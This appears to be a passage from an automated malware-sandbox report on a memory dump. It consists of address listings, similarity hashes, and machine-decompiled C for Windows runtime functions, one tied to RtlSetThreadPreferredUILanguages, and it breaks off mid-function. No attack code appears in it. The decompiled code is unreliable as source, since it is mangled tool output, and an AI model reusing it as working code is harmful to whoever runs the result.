                                                    0x04b725fe
                                                    0x00000000
                                                    0x04b728e6
                                                    0x04b728ec
                                                    0x04b728ef
                                                    0x04b728f5
                                                    0x04b728f8
                                                    0x04b728f8
                                                    0x00000000
                                                    0x04b728f8
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72866
                                                    0x04b72866
                                                    0x04b72876
                                                    0x04b72879
                                                    0x00000000
                                                    0x00000000
                                                    0x04b727e0
                                                    0x04b727e7
                                                    0x04b727e9
                                                    0x04b727eb
                                                    0x04bb5afd
                                                    0x00000000
                                                    0x04bb5afd
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72633
                                                    0x04b72638
                                                    0x04b7263b
                                                    0x04b7263c
                                                    0x04b7263e
                                                    0x04b72640
                                                    0x04b72642
                                                    0x04b72647
                                                    0x04b72649
                                                    0x04b7264e
                                                    0x04b72650
                                                    0x04b72653
                                                    0x04b72659
                                                    0x04b726a2
                                                    0x04b726a7
                                                    0x04b726ac
                                                    0x04b726b2
                                                    0x04bb5b11
                                                    0x04bb5b15
                                                    0x04bb5b17
                                                    0x00000000
                                                    0x04b726b8
                                                    0x04b726b8
                                                    0x04b726ba
                                                    0x04b727a6
                                                    0x04b727a6
                                                    0x04b727a9
                                                    0x04b727ab
                                                    0x04b727b9
                                                    0x04b727b9
                                                    0x04b727be
                                                    0x04b727c1
                                                    0x04b727c3
                                                    0x04b727c5
                                                    0x04b727c7
                                                    0x04bb5c74
                                                    0x04bb5c79
                                                    0x04bb5c79
                                                    0x04b727c7
                                                    0x00000000
                                                    0x04b726c0
                                                    0x04b726c0
                                                    0x04b726c3
                                                    0x04b726c6
                                                    0x04b726c6
                                                    0x04b726c9
                                                    0x04b726c9
                                                    0x00000000
                                                    0x04b726c9
                                                    0x04b726ba
                                                    0x04b7265b
                                                    0x04b7265b
                                                    0x04b7265e
                                                    0x04b72667
                                                    0x04b7266d
                                                    0x04b72677
                                                    0x04b7267c
                                                    0x04b7267f
                                                    0x04b72681
                                                    0x04bb5b49
                                                    0x04bb5b4e
                                                    0x04b727cd
                                                    0x04b727d0
                                                    0x04b727d1
                                                    0x04b727d2
                                                    0x04b727d4
                                                    0x04b727dd
                                                    0x04b72687
                                                    0x04b72687
                                                    0x04b7268a
                                                    0x04b7268b
                                                    0x04b7268e
                                                    0x04b7268f
                                                    0x04b72691
                                                    0x04b72696
                                                    0x04b72698
                                                    0x04b7269d
                                                    0x04b7269f
                                                    0x00000000
                                                    0x04b7269f
                                                    0x04b72681
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72846
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72605
                                                    0x04b7260a
                                                    0x04b7260c
                                                    0x04b72611
                                                    0x04b72616
                                                    0x04b72619
                                                    0x04b72619
                                                    0x04b7261e
                                                    0x00000000
                                                    0x04b72624
                                                    0x04b72627
                                                    0x04b72627
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5b1f
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72894
                                                    0x04b7289b
                                                    0x04b7289d
                                                    0x04b728a1
                                                    0x04bb5b2b
                                                    0x04bb5b2e
                                                    0x04bb5b2e
                                                    0x04b728a7
                                                    0x04b728a9
                                                    0x04bb5b04
                                                    0x04bb5b09
                                                    0x04bb5b09
                                                    0x04bb5b09
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5b35
                                                    0x04bb5b3c
                                                    0x04b728fb
                                                    0x04b728fb
                                                    0x04b726cc
                                                    0x04b726cc
                                                    0x04b726d0
                                                    0x00000000
                                                    0x04b726d2
                                                    0x04b726d2
                                                    0x00000000
                                                    0x04b726d2
                                                    0x00000000
                                                    0x00000000
                                                    0x04b725fe
                                                    0x04b7292d
                                                    0x04b7292d
                                                    0x04b72930
                                                    0x04b72935
                                                    0x04b72939
                                                    0x04b72945
                                                    0x04b72946
                                                    0x04b7295e
                                                    0x04b72966
                                                    0x04b7296e
                                                    0x04b72971
                                                    0x04b72976
                                                    0x04b7297e
                                                    0x04b7297f
                                                    0x04b72980
                                                    0x04b72981
                                                    0x04b72982
                                                    0x04b72983
                                                    0x04b72984
                                                    0x04b72985
                                                    0x04b72986
                                                    0x04b72987
                                                    0x04b72988
                                                    0x04b72989
                                                    0x04b7298a
                                                    0x04b7298b
                                                    0x04b7298c
                                                    0x04b7298d
                                                    0x04b7298e
                                                    0x04b7298f
                                                    0x04b72990
                                                    0x04b72992
                                                    0x04b72997
                                                    0x04b729a3
                                                    0x04b729a6
                                                    0x04b729ab
                                                    0x04b729ad
                                                    0x04b729b0
                                                    0x04b729b2
                                                    0x04bb5c80
                                                    0x04b729b8
                                                    0x04b729b8
                                                    0x04b729bb
                                                    0x04b729c0
                                                    0x04b729c5
                                                    0x04b729c6
                                                    0x04b729c6
                                                    0x04b729c9
                                                    0x04b729cb
                                                    0x00000000
                                                    0x00000000
                                                    0x04b729cd
                                                    0x04b729d0
                                                    0x04b729d9
                                                    0x04b729db
                                                    0x04b729dd
                                                    0x04b72a7f
                                                    0x04b72a84
                                                    0x04b72a87
                                                    0x04b72a89
                                                    0x04bb5ca1
                                                    0x04bb5ca3
                                                    0x00000000
                                                    0x04b72a8f
                                                    0x04b72a8f
                                                    0x00000000
                                                    0x04b72a8f
                                                    0x00000000
                                                    0x04b729e3
                                                    0x04b729e3
                                                    0x04b729e3
                                                    0x00000000
                                                    0x04b729e3
                                                    0x04b729dd
                                                    0x00000000
                                                    0x04b729db
                                                    0x04b729e6
                                                    0x04b729e9
                                                    0x04b729eb
                                                    0x04b729ed
                                                    0x04b729f3
                                                    0x04b729f5
                                                    0x04b729f8
                                                    0x04b729fa
                                                    0x04b72a97
                                                    0x04b72a9a
                                                    0x04b72a9d
                                                    0x04b72add
                                                    0x00000000
                                                    0x04b72a9f
                                                    0x04b72aa2
                                                    0x04b72aa5
                                                    0x04b72aa8
                                                    0x04b72aab
                                                    0x04bb5cab
                                                    0x04bb5caf
                                                    0x04bb5cc5
                                                    0x04bb5cda
                                                    0x04bb5cdc
                                                    0x04bb5cdf
                                                    0x04bb5ce5
                                                    0x00000000
                                                    0x04bb5ceb
                                                    0x04bb5ced
                                                    0x04bb5cee
                                                    0x00000000
                                                    0x04bb5cee
                                                    0x04bb5cb1
                                                    0x04bb5cb4
                                                    0x04bb5cb9
                                                    0x04bb5cbb
                                                    0x00000000
                                                    0x04bb5cbd
                                                    0x04bb5cbd
                                                    0x00000000
                                                    0x04bb5cbd
                                                    0x04bb5cbb
                                                    0x04b72ab1
                                                    0x04b72ab1
                                                    0x04b72ac4
                                                    0x04b72ac6
                                                    0x04b72ac6
                                                    0x00000000
                                                    0x04b72ac6
                                                    0x04b72aab
                                                    0x00000000
                                                    0x04b72a00
                                                    0x04b72a09
                                                    0x04b72a0e
                                                    0x04b72a21
                                                    0x04b72a24
                                                    0x04b72a35
                                                    0x04b72a3a
                                                    0x04b72a3d
                                                    0x04b72a42
                                                    0x04b72a59
                                                    0x04b72a59
                                                    0x04b72a5c
                                                    0x04b72a5f
                                                    0x04b72a5f
                                                    0x04b729fa
                                                    0x04b729f3
                                                    0x04b72a64
                                                    0x04b72a64
                                                    0x04b72a6b
                                                    0x04b72a6b
                                                    0x04b72a6d
                                                    0x04b72a72
                                                    0x04b72a72
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PATH
                                                    • API String ID: 0-1036084923
                                                    • Opcode ID: 8b8cd8982c6b8968e6729cb00abeefafd90d207d51a886320a3a931ad6e00adf
                                                    • Instruction ID: eb4308f0b8b7a8d5d0b893f07102dd53db6d6551b7d3780659be9085ad433c0f
                                                    • Opcode Fuzzy Hash: 8b8cd8982c6b8968e6729cb00abeefafd90d207d51a886320a3a931ad6e00adf
                                                    • Instruction Fuzzy Hash: 4DC18EB5E00219EBDB29DF98D981BBDB7B1FF48704F4440A9E851AB250E774BD41CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E04B7FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04B5EEF0(0x4c37b60);
					_t134 =  *0x4c37b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4c37b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4c37b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04B56D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04B576E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04BE8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04B4B150();
													}
													_t116 = E04BE6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04B575CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4c38638; // 0xca6800
																	_t122 = L04B538A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04B576E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04B576E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04B7FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04B570F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04B7FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04B7FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04B7FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04B7FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04B7FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4c37b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4c37b84 = _t75;
						_t73 = E04B5EB70(_t134, 0x4c37b60);
						if( *0x4c37b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04B5FF60( *0x4c37b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                    0x04b7fab0
                                                    0x04b7fab2
                                                    0x04b7fab3
                                                    0x04b7fab4
                                                    0x04b7fabc
                                                    0x04b7fac0
                                                    0x04b7fb14
                                                    0x04b7fb17
                                                    0x04b7fac2
                                                    0x04b7fac8
                                                    0x04b7facd
                                                    0x04b7fad3
                                                    0x04b7fad3
                                                    0x04b7fadd
                                                    0x04b7fb18
                                                    0x04b7fb1b
                                                    0x04b7fb1d
                                                    0x04b7fb1e
                                                    0x04b7fb1f
                                                    0x04b7fb20
                                                    0x04b7fb21
                                                    0x04b7fb22
                                                    0x04b7fb23
                                                    0x04b7fb24
                                                    0x04b7fb25
                                                    0x04b7fb26
                                                    0x04b7fb27
                                                    0x04b7fb28
                                                    0x04b7fb29
                                                    0x04b7fb2a
                                                    0x04b7fb2b
                                                    0x04b7fb2c
                                                    0x04b7fb2d
                                                    0x04b7fb2e
                                                    0x04b7fb2f
                                                    0x04b7fb3a
                                                    0x04b7fb3b
                                                    0x04b7fb3e
                                                    0x04b7fb41
                                                    0x04b7fb44
                                                    0x04b7fb47
                                                    0x04b7fb4a
                                                    0x04b7fb4d
                                                    0x04b7fb53
                                                    0x04bbbdcb
                                                    0x04bbbdcb
                                                    0x04b7fb59
                                                    0x04b7fb5b
                                                    0x04b7fb5b
                                                    0x04b7fb5e
                                                    0x04bbbdd5
                                                    0x04bbbdd8
                                                    0x00000000
                                                    0x04bbbdda
                                                    0x00000000
                                                    0x04bbbdda
                                                    0x04b7fb64
                                                    0x04b7fb64
                                                    0x04b7fb64
                                                    0x04b7fb67
                                                    0x04b7fb6e
                                                    0x04b7fb70
                                                    0x04b7fb72
                                                    0x00000000
                                                    0x04b7fb78
                                                    0x04b7fb7a
                                                    0x04b7fb7a
                                                    0x04b7fb7d
                                                    0x04b7fb80
                                                    0x04bbbddf
                                                    0x04bbbde1
                                                    0x00000000
                                                    0x04bbbde3
                                                    0x00000000
                                                    0x04bbbde3
                                                    0x04b7fb86
                                                    0x04b7fb86
                                                    0x04b7fb86
                                                    0x04b7fb8b
                                                    0x04b7fb90
                                                    0x04b7fb92
                                                    0x04b7fb94
                                                    0x04b7fb9a
                                                    0x04b7fb9b
                                                    0x04b7fba1
                                                    0x04bbbde8
                                                    0x04bbbdeb
                                                    0x04bbbded
                                                    0x04bbbeb5
                                                    0x04bbbeb5
                                                    0x04bbbebb
                                                    0x04bbbebd
                                                    0x04bbbec3
                                                    0x04bbbed2
                                                    0x04bbbedd
                                                    0x04bbbedd
                                                    0x04bbbeed
                                                    0x00000000
                                                    0x04bbbdf3
                                                    0x04bbbdfe
                                                    0x04bbbe06
                                                    0x04bbbe0b
                                                    0x04bbbe0d
                                                    0x04bbbe0f
                                                    0x04bbbe14
                                                    0x04bbbe19
                                                    0x04bbbe20
                                                    0x04bbbe25
                                                    0x04bbbe27
                                                    0x04bbbe35
                                                    0x04bbbe39
                                                    0x04bbbe46
                                                    0x04bbbe4f
                                                    0x04bbbe54
                                                    0x04bbbe56
                                                    0x04bbbef8
                                                    0x04bbbef8
                                                    0x00000000
                                                    0x04bbbe5c
                                                    0x04bbbe5c
                                                    0x04bbbe60
                                                    0x00000000
                                                    0x04bbbe66
                                                    0x04bbbe66
                                                    0x04bbbe7f
                                                    0x04bbbe84
                                                    0x04bbbe87
                                                    0x04bbbe89
                                                    0x04bbbe8b
                                                    0x04bbbe99
                                                    0x04bbbe9d
                                                    0x04bbbea0
                                                    0x04bbbeac
                                                    0x04bbbeaf
                                                    0x04bbbeb1
                                                    0x04bbbeb3
                                                    0x04bbbeb3
                                                    0x00000000
                                                    0x04bbbea2
                                                    0x04bbbea2
                                                    0x00000000
                                                    0x04bbbea2
                                                    0x04bbbe8d
                                                    0x04bbbe8d
                                                    0x04bbbe92
                                                    0x00000000
                                                    0x04bbbe92
                                                    0x04bbbe8b
                                                    0x04bbbe60
                                                    0x04bbbe3b
                                                    0x04bbbe3b
                                                    0x04bbbe3e
                                                    0x00000000
                                                    0x04bbbe40
                                                    0x04bbbe40
                                                    0x04bbbe44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bbbe44
                                                    0x04bbbe3e
                                                    0x04bbbe29
                                                    0x04bbbe29
                                                    0x00000000
                                                    0x04bbbe29
                                                    0x04bbbe27
                                                    0x00000000
                                                    0x04b7fba7
                                                    0x04b7fba7
                                                    0x04b7fbab
                                                    0x04bbbf02
                                                    0x04b7fbb1
                                                    0x04b7fbb1
                                                    0x04b7fbb8
                                                    0x04b7fbbd
                                                    0x04b7fbbd
                                                    0x04b7fbbf
                                                    0x04b7fbbf
                                                    0x04b7fbc5
                                                    0x04b7fbcb
                                                    0x04b7fbf8
                                                    0x04b7fbf8
                                                    0x04b7fbfa
                                                    0x00000000
                                                    0x04b7fc00
                                                    0x04b7fc00
                                                    0x04b7fc03
                                                    0x00000000
                                                    0x04b7fc09
                                                    0x04b7fc09
                                                    0x04b7fc0f
                                                    0x04b7fc15
                                                    0x04b7fc23
                                                    0x04b7fc23
                                                    0x04b7fc25
                                                    0x04b7fc27
                                                    0x04b7fc75
                                                    0x04b7fc7c
                                                    0x04b7fc84
                                                    0x00000000
                                                    0x04b7fc29
                                                    0x04b7fc29
                                                    0x04b7fc2d
                                                    0x04b7fc30
                                                    0x04bbbf0f
                                                    0x00000000
                                                    0x04b7fc36
                                                    0x04b7fc38
                                                    0x04b7fc3b
                                                    0x04b7fc41
                                                    0x04bbbf17
                                                    0x04bbbf19
                                                    0x04bbbf48
                                                    0x04bbbf4b
                                                    0x00000000
                                                    0x04bbbf1b
                                                    0x04bbbf22
                                                    0x04bbbf24
                                                    0x04bbbf26
                                                    0x00000000
                                                    0x04bbbf2c
                                                    0x04bbbf37
                                                    0x04bbbf39
                                                    0x04bbbf3b
                                                    0x00000000
                                                    0x04bbbf41
                                                    0x04bbbf41
                                                    0x04bbbf41
                                                    0x04bbbf41
                                                    0x04bbbf45
                                                    0x00000000
                                                    0x04bbbf45
                                                    0x04bbbf3b
                                                    0x04bbbf26
                                                    0x00000000
                                                    0x04b7fc47
                                                    0x04b7fc47
                                                    0x04b7fc49
                                                    0x04b7fcb2
                                                    0x04b7fcb4
                                                    0x04b7fcb6
                                                    0x04b7fcdc
                                                    0x04b7fcdc
                                                    0x00000000
                                                    0x04b7fcb8
                                                    0x04b7fcc3
                                                    0x04b7fcc5
                                                    0x04b7fcc7
                                                    0x00000000
                                                    0x04b7fcc9
                                                    0x04b7fcc9
                                                    0x04b7fccd
                                                    0x00000000
                                                    0x04b7fccd
                                                    0x04b7fcc7
                                                    0x00000000
                                                    0x04b7fc4b
                                                    0x04b7fc4b
                                                    0x04b7fc4e
                                                    0x04b7fc4e
                                                    0x04b7fc51
                                                    0x04b7fc51
                                                    0x04b7fc54
                                                    0x04b7fc5a
                                                    0x04b7fc5c
                                                    0x04b7fc5f
                                                    0x04b7fc61
                                                    0x04b7fc63
                                                    0x04b7fc65
                                                    0x04b7fc67
                                                    0x04b7fc6e
                                                    0x04b7fc72
                                                    0x04b7fc72
                                                    0x04b7fc72
                                                    0x04b7fc72
                                                    0x04b7fc67
                                                    0x04b7fc61
                                                    0x00000000
                                                    0x04b7fc5a
                                                    0x04b7fc49
                                                    0x04b7fc41
                                                    0x04b7fc30
                                                    0x04b7fc27
                                                    0x04b7fc03
                                                    0x04b7fbcd
                                                    0x04b7fbd3
                                                    0x04b7fbd9
                                                    0x04b7fbdc
                                                    0x04b7fbde
                                                    0x04b7fc99
                                                    0x04b7fc9b
                                                    0x04b7fc9d
                                                    0x04b7fcd5
                                                    0x04b7fcd5
                                                    0x04b7fc89
                                                    0x04b7fc89
                                                    0x00000000
                                                    0x04b7fc9f
                                                    0x04b7fc9f
                                                    0x04b7fca3
                                                    0x00000000
                                                    0x04b7fca3
                                                    0x00000000
                                                    0x04b7fbe4
                                                    0x04b7fbe4
                                                    0x04b7fbe4
                                                    0x04b7fbe4
                                                    0x04b7fbe9
                                                    0x04b7fbf2
                                                    0x00000000
                                                    0x04b7fbf2
                                                    0x04b7fbde
                                                    0x04b7fbcb
                                                    0x04b7fbab
                                                    0x04b7fc8b
                                                    0x04b7fc8b
                                                    0x04b7fc8c
                                                    0x04b7fb80
                                                    0x04b7fb72
                                                    0x04b7fb5e
                                                    0x04b7fc8d
                                                    0x04b7fc91
                                                    0x04b7fadf
                                                    0x04b7fadf
                                                    0x04b7fae1
                                                    0x04b7fae4
                                                    0x04b7fae7
                                                    0x04b7faec
                                                    0x04b7faf8
                                                    0x04b7fb00
                                                    0x04b7fb07
                                                    0x04b7fb0f
                                                    0x04b7fb0f
                                                    0x04b7fb07
                                                    0x00000000
                                                    0x04b7faf8
                                                    0x04b7fadd

                                                    Strings
                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04BBBE0F
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                    • API String ID: 0-865735534
                                                    • Opcode ID: ed1b6c865e0d0dbe1a94c5394d8915914a43606f879faf3d559d922849a6be2d
                                                    • Instruction ID: bd2587faefb5e52a703381860cd39c5301748b1e7a29391f266bb62cd942aa19
                                                    • Opcode Fuzzy Hash: ed1b6c865e0d0dbe1a94c5394d8915914a43606f879faf3d559d922849a6be2d
                                                    • Instruction Fuzzy Hash: 5FA12471B006059BEB25CF68C850BBAB7A4EF48714F0449E9E962DB790EB74F801DB84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B42D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 63%
                                                    			E04B42D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4c35350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4c37bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04B897C0();
				}
				if( *0x4c379c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4c379c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04B71624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
